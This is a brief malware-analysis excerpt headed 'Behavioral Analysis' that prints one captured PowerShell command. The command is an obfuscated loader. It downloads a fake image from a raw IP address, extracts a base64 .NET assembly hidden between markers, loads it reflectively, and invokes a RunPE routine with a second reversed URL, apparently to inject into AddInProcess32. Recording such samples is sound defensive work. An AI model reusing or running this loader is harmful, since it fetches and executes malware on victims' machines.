Behavioral Analysis

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"